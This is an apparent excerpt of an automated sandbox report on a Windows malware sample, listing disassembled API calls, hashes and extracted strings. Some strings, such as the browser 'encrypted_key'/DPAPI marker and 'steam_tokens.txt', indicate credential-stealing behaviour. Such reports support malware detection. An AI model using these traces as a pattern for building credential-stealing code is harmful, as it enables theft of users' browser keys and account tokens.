                          • Instruction Fuzzy Hash: CB01F279600209BFD710DBA4EC4DFAF7B6CEB45311F008156FE08D2250EB74594487A1
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 0051723E
                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00517279
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00517280
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 005172C3
                          • HeapFree.KERNEL32(00000000), ref: 005172CA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00517329
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                          • String ID:
                          • API String ID: 174687898-0
                          • Opcode ID: d956839d3e0b7abc3751d598380a819947d1e0ae048226d7e77bf419702e5a20
                          • Instruction ID: cbd897c0456aeda9159fae66d6b500a66af4a82bb77dbdd7a1435ce17b0986b5
                          • Opcode Fuzzy Hash: d956839d3e0b7abc3751d598380a819947d1e0ae048226d7e77bf419702e5a20
                          • Instruction Fuzzy Hash: 58418D7570420A9BEB20CF6DDC84BAAB7F8FB89301F1449A9EC59C7310E735E980DA50
                          APIs
                          • memset.MSVCRT ref: 0052D7D6
                          • RegOpenKeyExA.ADVAPI32(80000001,011AD408,00000000,00020119,?), ref: 0052D7F5
                          • RegQueryValueExA.ADVAPI32(?,011ADE88,00000000,00000000,00000000,000000FF), ref: 0052D819
                          • RegCloseKey.ADVAPI32(?), ref: 0052D823
                          • lstrcat.KERNEL32(?,00000000), ref: 0052D848
                          • lstrcat.KERNEL32(?,011ADD68), ref: 0052D85C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          • Opcode ID: a2cbdf47fbc0e279f0359acc9156e94ead2e9f530a131a0cc073dd664d0354ea
                          • Instruction ID: 1d184980623f71e177e832d644456fdf0a840ab531ad8dea7edf2e076171806b
                          • Opcode Fuzzy Hash: a2cbdf47fbc0e279f0359acc9156e94ead2e9f530a131a0cc073dd664d0354ea
                          • Instruction Fuzzy Hash: FB41B075A1010D9BDB54EF24FC86FDE7BB9BF84300F0080A5BA0997251EF74AA858F91
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 00519CA8
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00519CDA
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00519D03
                          Strings
                          • API ID: AllocLocallstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2746078483-738592651
                          • Opcode ID: 70063732fb1cdacb3daa68279a37e3bdf9a45493d651cff5c272783a0ceebf5f
                          • Instruction ID: dc06503c57ec1abd1261fadfcb0dab1922ac428aecb0019da2b13b6fe2dcf359
                          • Opcode Fuzzy Hash: 70063732fb1cdacb3daa68279a37e3bdf9a45493d651cff5c272783a0ceebf5f
                          • Instruction Fuzzy Hash: 0741C531A0020A9BEB21EF64EC956EEBFB5BF94704F044468E955A7252DB70ED84CBD0
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0052EA24
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052EA53
                          • lstrcat.KERNEL32(?,00000000), ref: 0052EA61
                          • lstrcat.KERNEL32(?,00541794), ref: 0052EA7A
                          • lstrcat.KERNEL32(?,011A8B20), ref: 0052EA8D
                          • lstrcat.KERNEL32(?,00541794), ref: 0052EA9F
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: dc1a575152f9b71a0ea6442e27acd51512d1e149613828b4251f63e800284aa1
                          • Instruction ID: 9c5b42025f1b110b2d6e71c27b2f1d40f49cbad012fd57ad972e8afd9a36036c
                          • Opcode Fuzzy Hash: dc1a575152f9b71a0ea6442e27acd51512d1e149613828b4251f63e800284aa1
                          • Instruction Fuzzy Hash: 39411675A50119ABDB10EB64EC46EEE3B79FF89300F0044A9BA1697280DF749EC48F94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052ECDF
                          • lstrlen.KERNEL32(00000000), ref: 0052ECF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052ED1D
                          • lstrlen.KERNEL32(00000000), ref: 0052ED24
                          • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0052ED52
                          Strings
                          • API ID: lstrcpy$lstrlen
                          • String ID: steam_tokens.txt
                          • API String ID: 367037083-401951677
                          • Opcode ID: 506ec5f1b93907ea922c1f78a82ef7f3af1306b1cc266cd745b47343cadd4efa
                          • Instruction ID: bb592cc172e4c1a87faa3925257ea4338e712b33c6635efbf3327673567f25bf
                          • Opcode Fuzzy Hash: 506ec5f1b93907ea922c1f78a82ef7f3af1306b1cc266cd745b47343cadd4efa
                          • Instruction Fuzzy Hash: 5731C131A505165BE722BB78FC4EA9E7FA9BF82300F045020F806DB252EB74DC958BC1
                          APIs
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0051140E), ref: 00519A9A
                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0051140E), ref: 00519AB0
                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,0051140E), ref: 00519AC7
                          • ReadFile.KERNEL32(00000000,00000000,?,0051140E,00000000,?,?,?,0051140E), ref: 00519AE0
                          • LocalFree.KERNEL32(?,?,?,?,0051140E), ref: 00519B00
                          • CloseHandle.KERNEL32(00000000,?,?,?,0051140E), ref: 00519B07
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 63759577dcd31cebd03d88d93b12eb4dd15bf6767418a382cbc1a3b0e17f40e5
                          • Instruction ID: 933b3ba0cbd767746aafc74883c0ac3dc26d8a56f2d0221a348f63a79fcfaedb
                          • Opcode Fuzzy Hash: 63759577dcd31cebd03d88d93b12eb4dd15bf6767418a382cbc1a3b0e17f40e5
                          • Instruction Fuzzy Hash: 1611797060420AAFEB10DFA8DC98EAF7B7CFB05700F14421AF90196280EB749D80CBA5
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00535B14
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A188
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A1AE
                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00535B7C
                          • memmove.MSVCRT(00000000,?,?), ref: 00535B89
                          • memmove.MSVCRT(00000000,?,?), ref: 00535B98
                          Strings
                          • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long
                          • API String ID: 2052693487-3788999226
                          • Opcode ID: 63eac08ad3e9c10c4a008de30b4b2166858cec69f8171782c3b8b6143a7eff30
                          • Instruction ID: 66eb1f7430b0538060769c84e2aca1cff4b6ddff6515b864569f738ddb2e1037
                          • Opcode Fuzzy Hash: 63eac08ad3e9c10c4a008de30b4b2166858cec69f8171782c3b8b6143a7eff30
                          • Instruction Fuzzy Hash: 92417F71B005199FCF08DF6CC995AAEBBB5FB88310F158629E909E7384E634DD00CB90
                          APIs
                          Strings
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          • Opcode ID: 57e7b5b43bfd28b498c77806e87ffe5073650cc6989949eb9a94d38f3aed0f54
                          • Instruction ID: 449d3a429eb7a98a5ef0fc32098db88337c16233f1c5cec819439675c054f303
                          • Opcode Fuzzy Hash: 57e7b5b43bfd28b498c77806e87ffe5073650cc6989949eb9a94d38f3aed0f54
                          • Instruction Fuzzy Hash: FE4118F450475C9EDB318B248C89FFBBFFDAB45304F1448E8E98696182E2B19A44DF60
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00527D58
                            • Part of subcall function 0053A1C0: std::exception::exception.LIBCMT ref: 0053A1D5
                            • Part of subcall function 0053A1C0: std::exception::exception.LIBCMT ref: 0053A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 00527D76
                          • std::_Xinvalid_argument.LIBCPMT ref: 00527D91
                          Strings
                          • API ID: Xinvalid_argumentstd::_$std::exception::exception
                          • String ID: invalid string position$string too long
                          • API String ID: 3310641104-4289949731
                          • Opcode ID: b99284a9cad083b815593d0a63385b2ec575e22fbc9a60fe07eeea821085b4af
                          • Instruction ID: 7168c5debc65e95da57d6c4ed35614bec9d144b672f7393a31695dadd5799aed
                          • Opcode Fuzzy Hash: b99284a9cad083b815593d0a63385b2ec575e22fbc9a60fe07eeea821085b4af
                          • Instruction Fuzzy Hash: 0E21B9323046144BD721DE6CE881A3ABBE5FF96710F204A6EE491CB2C1D771DC40C7A5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005333EF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 005333F6
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00533411
                          • wsprintfA.USER32 ref: 00533437
                          Strings
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB
                          • API String ID: 2922868504-2651807785
                          • Opcode ID: 4847987987bb2e01675d2257bf253d71fa738aadb2c27326d473f6fe56acaa95
                          • Instruction ID: 17742673e533d2cc427d7c355e1f8b6f33e93ad371d32dd1431c3bc99c1120e6
                          • Opcode Fuzzy Hash: 4847987987bb2e01675d2257bf253d71fa738aadb2c27326d473f6fe56acaa95
                          • Instruction Fuzzy Hash: E701FC75A04218AFDB14DF98DC49BAEBBBCFB45710F00462AFA06E7390D7785D0086A5
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlenmemset
                          • String ID:
                          • API String ID: 3212139465-0
                          • Opcode ID: 289424d2f7dec23f0b86936b2040b97226c8bd66745c2d8d831c039e24a75de0
                          • Instruction ID: c40edcef472882906155e7ddb6eefcc36250f8c456e534705e1e077345690964
                          • Opcode Fuzzy Hash: 289424d2f7dec23f0b86936b2040b97226c8bd66745c2d8d831c039e24a75de0
                          • Instruction Fuzzy Hash: 2581C2B1E0020A9BDF14CF94DC44BAEBBB5BF94300F24806DE508AB281EB759D46CF94
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00527F31
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00527F60
                          • StrCmpCA.SHLWAPI(00000000,00544C3C), ref: 00527FA5
                          • StrCmpCA.SHLWAPI(00000000,00544C3C), ref: 00527FD3
                          • StrCmpCA.SHLWAPI(00000000,00544C3C), ref: 00528007
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 98fdc3cd147de905a453f116930cbf877aeef6a91afa6a338a354d6c632431d7
                          • Instruction ID: 07c347c3ad05e15267c6ab658d9f00c746281ed83d9cfac081f78bc7c0b39a3d
                          • Opcode Fuzzy Hash: 98fdc3cd147de905a453f116930cbf877aeef6a91afa6a338a354d6c632431d7
                          • Instruction Fuzzy Hash: D241E23050812ADFCB20DF68E984EAE7BB4FF5A300F114489E805DB391DB70AA65CF91
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 005280BB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005280EA
                          • StrCmpCA.SHLWAPI(00000000,00544C3C), ref: 00528102
                          • lstrlen.KERNEL32(00000000), ref: 00528140
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052816F
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 2e65804f5cabec85f8fbdd6b39fcc78a4f7a4163c2488d29234d68c7beb1e759
                          • Instruction ID: 690fc5b41ccafecdbdf69f9a75b4fe172e05b411bc8c133ece3d959787d5fc0b
                          • Opcode Fuzzy Hash: 2e65804f5cabec85f8fbdd6b39fcc78a4f7a4163c2488d29234d68c7beb1e759
                          • Instruction Fuzzy Hash: 7D41BE35601116ABDB21DFB8E988BAABFF4FF41700F10841DA845D7284EF34D996CB90
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00531B72
                            • Part of subcall function 00531820: lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0053184F
                            • Part of subcall function 00531820: lstrlen.KERNEL32(01196188), ref: 00531860
                            • Part of subcall function 00531820: lstrcpy.KERNEL32(00000000,00000000), ref: 00531887
                            • Part of subcall function 00531820: lstrcat.KERNEL32(00000000,00000000), ref: 00531892
                            • Part of subcall function 00531820: lstrcpy.KERNEL32(00000000,00000000), ref: 005318C1
                            • Part of subcall function 00531820: lstrlen.KERNEL32(00544FA0), ref: 005318D3
                            • Part of subcall function 00531820: lstrcpy.KERNEL32(00000000,00000000), ref: 005318F4
                            • Part of subcall function 00531820: lstrcat.KERNEL32(00000000,00544FA0), ref: 00531900
                            • Part of subcall function 00531820: lstrcpy.KERNEL32(00000000,00000000), ref: 0053192F
                          • sscanf.NTDLL ref: 00531B9A
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00531BB6
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00531BC6
                          • ExitProcess.KERNEL32 ref: 00531BE3
                          Yara matches
                          Similarity
                          • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                          • String ID:
                          • API String ID: 3040284667-0
                          • Opcode ID: 6b64f4cfbd2fe831fa1a0d4839d5a38ff6d6b94231e9e9b8f1d240ba53d42df0
                          • Instruction ID: 577b542c0bb9008ae6815c8581a0176a11ae36b890f61a47ef3eab6fc9dc787e
                          • Opcode Fuzzy Hash: 6b64f4cfbd2fe831fa1a0d4839d5a38ff6d6b94231e9e9b8f1d240ba53d42df0
                          • Instruction Fuzzy Hash: 7721E4B5518302AF8350DF65D88585FBBF8FEC9214F408A1EF599C3220E734D5058BAA
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00533166
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0053316D
                          • RegOpenKeyExA.ADVAPI32(80000002,0119B9A0,00000000,00020119,?), ref: 0053318C
                          • RegQueryValueExA.ADVAPI32(?,011AD508,00000000,00000000,00000000,000000FF), ref: 005331A7
                          • RegCloseKey.ADVAPI32(?), ref: 005331B1
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 12da11c0cec8274511b0babc0ca91172d4ed5893b5971d1087d6829403084194
                          • Instruction ID: 7c57c316696a397f2238a7eece63c29834570e92fd040f5b049ee95000944447
                          • Opcode Fuzzy Hash: 12da11c0cec8274511b0babc0ca91172d4ed5893b5971d1087d6829403084194
                          • Instruction Fuzzy Hash: 6C114276A40209AFD710DB94DC45FBFBBBCF745711F00451AFA05D3690DB7559048BA1
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00518996
                            • Part of subcall function 0053A1C0: std::exception::exception.LIBCMT ref: 0053A1D5
                            • Part of subcall function 0053A1C0: std::exception::exception.LIBCMT ref: 0053A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 005189CD
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A188
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A1AE
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: invalid string position$string too long
                          • API String ID: 2002836212-4289949731
                          • Opcode ID: 99ed57d222cba9ce7b54481e52435cd0b05efa94211d453811857ad6d7e8db98
                          • Instruction ID: 7ddcc9f9099bc97b0bda4994edae318d9fe153609036535cc610e3cdb1c51567
                          • Opcode Fuzzy Hash: 99ed57d222cba9ce7b54481e52435cd0b05efa94211d453811857ad6d7e8db98
                          • Instruction Fuzzy Hash: 932194723006508BE7319A5CE840ABAFB99FFA1761F15093BF151CB241CB71DC81C7A5
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00518883
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A188
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A1AE
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: df4474d9397da14d31927c61d9113ea27b07e91f8995bec2b0c3c042d0266a7f
                          • Instruction ID: 3fd3293d7eeb50476b7ccb79b2db457defc8825ee06423728644e822592aaa7c
                          • Opcode Fuzzy Hash: df4474d9397da14d31927c61d9113ea27b07e91f8995bec2b0c3c042d0266a7f
                          • Instruction Fuzzy Hash: 1731B5B5E005159BCB08DF58C891AAEBBB6FB88310F148269E905EB385DB30AD41CB91
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00535922
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A188
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A1AE
                          • std::_Xinvalid_argument.LIBCPMT ref: 00535935
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_std::exception::exception
                          • String ID: Sec-WebSocket-Version: 13$string too long
                          • API String ID: 1928653953-3304177573
                          • Opcode ID: c604123836ceffea98e4cf0f794e8874a3f5b60985eb4a1e44703b2f3f81defc
                          • Instruction ID: d1cba1799f135d9b393980a0fc0ee14962fab9864b974404b4886dfc1d3b4275
                          • Opcode Fuzzy Hash: c604123836ceffea98e4cf0f794e8874a3f5b60985eb4a1e44703b2f3f81defc
                          • Instruction Fuzzy Hash: DA115E32304B41CBD7328B2CE800B1ABFE1BBD5761F251A5EE4D1CB696E761D841C7A5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0053A430,000000FF), ref: 00533D20
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00533D27
                          • wsprintfA.USER32 ref: 00533D37
                            • Part of subcall function 005371E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005371FE
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 57fcbc4421652774c6256263846af00bc6cf04d748e8727aa1fb112389c2adfb
                          • Instruction ID: 7320d864757cf760686637ae3e8ad5cf7f3f5f954020196d3e2839a1047edb80
                          • Opcode Fuzzy Hash: 57fcbc4421652774c6256263846af00bc6cf04d748e8727aa1fb112389c2adfb
                          • Instruction Fuzzy Hash: F601C075640304BBE7209B54DC4AF6BBBB8FB46B61F004116FA05972E0D7B81900C6AA
                          APIs
                          • __getptd.LIBCMT ref: 00539279
                            • Part of subcall function 005387FF: __amsg_exit.LIBCMT ref: 0053880F
                          • __amsg_exit.LIBCMT ref: 00539299
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit$__getptd
                          • String ID: XuT$XuT
                          • API String ID: 441000147-1755042536
                          • Opcode ID: 78f32d62c93e2e3633179e3e6ec4283dfcef306fbc5ac4f811efc05745cb7d50
                          • Instruction ID: 1f47710a836f3b120563a1c3026d2e2477b1f3b6b9dc0507ec40fac9d2127104
                          • Opcode Fuzzy Hash: 78f32d62c93e2e3633179e3e6ec4283dfcef306fbc5ac4f811efc05745cb7d50
                          • Instruction Fuzzy Hash: 8301D2BAD06F1ABBCB20AB2C94097DEBFA0BF59B14F150404F41067680CBA06C41DBE6
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00518737
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A188
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 8fbf071053495814d43b459ad1bcbfd3f8ac737a14d25c2b76058c7af2e642c3
                          • Instruction ID: f993f60814f77534985645a7e954b750d383b7e475820837eca04accd169e6aa
                          • Opcode Fuzzy Hash: 8fbf071053495814d43b459ad1bcbfd3f8ac737a14d25c2b76058c7af2e642c3
                          • Instruction Fuzzy Hash: B5F06237B000221B9324643E8D854AEAD46A7E5390339D625E855DF299DC72DCC285D4
                          APIs
                            • Part of subcall function 0053781C: __mtinitlocknum.LIBCMT ref: 00537832
                            • Part of subcall function 0053781C: __amsg_exit.LIBCMT ref: 0053783E
                          • ___addlocaleref.LIBCMT ref: 00538756
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
